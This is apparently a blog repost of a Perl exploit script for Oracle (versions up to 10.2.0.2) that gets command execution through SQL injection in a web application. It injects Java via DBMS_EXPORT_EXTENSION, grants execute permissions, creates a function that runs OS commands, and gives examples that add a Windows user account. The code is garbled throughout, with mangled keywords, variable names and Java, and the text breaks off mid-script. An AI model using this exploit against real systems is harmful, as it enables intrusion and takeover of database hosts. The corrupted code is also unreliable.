Baishen blog
Two articles about this:
Http://www.bkjia.com/Article/200810/30019.html
Http://www.red-database-security... nds_via_webapp.html
CODE:
#! /Usr/bin/env perl
Use LWP: Simple;
Print "-----------------------------------------------------------------------";
Print "Oracle command execution via web apps ";
Print "sid-at-NotSoSecure // www.notsosecure.com ";
Print "suported versions <= 10.2.0.2, all platforms ";
Print "------------------------------------------------------------------------";
If (@ ARGV <2)
{
Print "Usage :";
Print "ora_cmd_exec.pl <URL> <cmd-to-exec> ";
Print "";
Print "EXAMPLE:./ora_rj_exec.pl" http: // 192.168.172.129: 81/ora3.php? Name = s "" net user notsosecure n0tsos3cur3/add "";
Print "EXAMPLE:./ora_rj_exec.pl" http: // 192.168.172.129: 81/ora3.php? Id = 100 "" net user notsosecure n0tsos3cur3/add "";
Print "------------------------------------------------------------------------";
Exit ();
}
My $ url_1 = $ ARGV [0]. "and 1 = ";
My $ javalib = "(select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT". PUT (: P1); EXECUTE IMMEDIATE
Declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace and compile java source named
"LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args)
{Try {BufferedReader myReader = new BufferedReader (new InputStreamReader (runtime.getruntime(.exe c (args). getInputStream ()
); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return
Str;} catch (Exception e) {return e. toString () ;}} public static String readFile (String filename) {try {BufferedReader
MyReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! =
Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return str;} catch (Exception e) {return
E. toString () ;}}; END; --, SYS, 0) from dual )--";
My $ javaperm = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate begin dbms_java.grant_permission (
PUBLIC, SYS: java. io. FilePermission, <>, execute); end; END; --, SYS, 0, 1) from dual )--";
My $ export _exec_func = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace function
LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. string) return String; END; --, SYS, 0, 1) from dual )--";
My $ export _exec_func_priv = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxRunCMD
To public; END; --, SYS, 0, 0) from dual )--";
My $1__1 = $ ARGV [1];
My $ cmd_exec = "(select sys.LinxRunCMD(cmd.exe/c". $ cmd_1. ") from dual )--";
Print "Step 1. Creating Java Library ...";
Print "--------------------------------";
My $ url = $ url_1. $ javalib;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 1 occured !!!... Did you provide me the URL in the format, I want ?? ";
Print "-----------------------------------------------";
} Else {
Print "NO errors encountered... proceeding to step... 2 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 2. granting java execute privileges ...";
My $ url = $ url_1. $ javaperm;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 2 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 3 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 3. creating funtion for command execution ...";
My $ url = $ url_1. $ pai_exec_func;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 3 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 4 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 4. making function executable by all users ...";
My $ url = $ url_1. $ pai_exec_func_priv;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 4 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 5 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 5. RIGHT !!!, By now we shoshould have a function sys. LinxRunCMD through which we can execute commands ...";
Print "--------------------------------";
Print "You shoshould be able to execute this function as: select sys.linxrun.pdf (.exe/c net user notsosecure n0ts3cur3/add) from dual ";
Print "I will execute the command you told me to execute... you wont be able to see the output though :(";
My $ url = $ url_1. $ pai_exec;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 5 occured !!!